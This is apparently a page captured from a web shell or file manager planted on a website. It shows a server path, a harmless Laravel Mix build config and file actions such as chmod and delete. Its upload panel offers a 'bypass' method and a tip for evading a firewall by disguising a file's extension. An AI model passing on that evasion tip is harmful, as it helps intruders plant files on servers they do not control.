Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
multi-event-cfp.bitkit.dk
httpdocs
File Content:
webpack.mix.js
const mix = require("laravel-mix"); /* |-------------------------------------------------------------------------- | Mix Asset Management |-------------------------------------------------------------------------- | | Mix provides a clean, fluent API for defining some Webpack build steps | for your Laravel applications. By default, we are compiling the CSS | file for the application as well as bundling up all the JS files. | */ // mix.js('resources/js/app.js', 'public/js') // .postCss('resources/css/app.css', 'public/css', [ // // // ]); mix.js("resources/js/index.js", "public/js") .webpackConfig({ output: { chunkFilename: 'js/[id].js?v=[hash]', }, }) .react() .sass("resources/sass/app.scss", "public/css") .version();
Edit
Download
Unzip
Chmod
Delete